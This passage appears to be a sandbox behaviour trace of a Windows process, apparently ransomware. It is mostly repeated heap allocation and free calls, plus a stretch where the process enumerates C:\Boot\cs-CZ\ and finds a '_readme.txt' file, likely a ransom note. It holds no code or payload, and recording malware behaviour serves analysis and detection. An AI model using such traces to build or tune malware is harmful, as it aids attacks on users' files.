0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.456] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.456] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.457] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.457] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.458] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.458] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.458] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.458] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.458] PathFindFileNameW (pszPath="") returned="" [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.458] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.458] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.458] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.458] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.458] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0146.458] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.458] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.458] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0146.460] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.460] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.460] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.460] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.460] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.460] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.460] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.460] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea61310, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.460] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.460] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.461] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.461] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.461] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.462] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.462] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.463] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.463] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 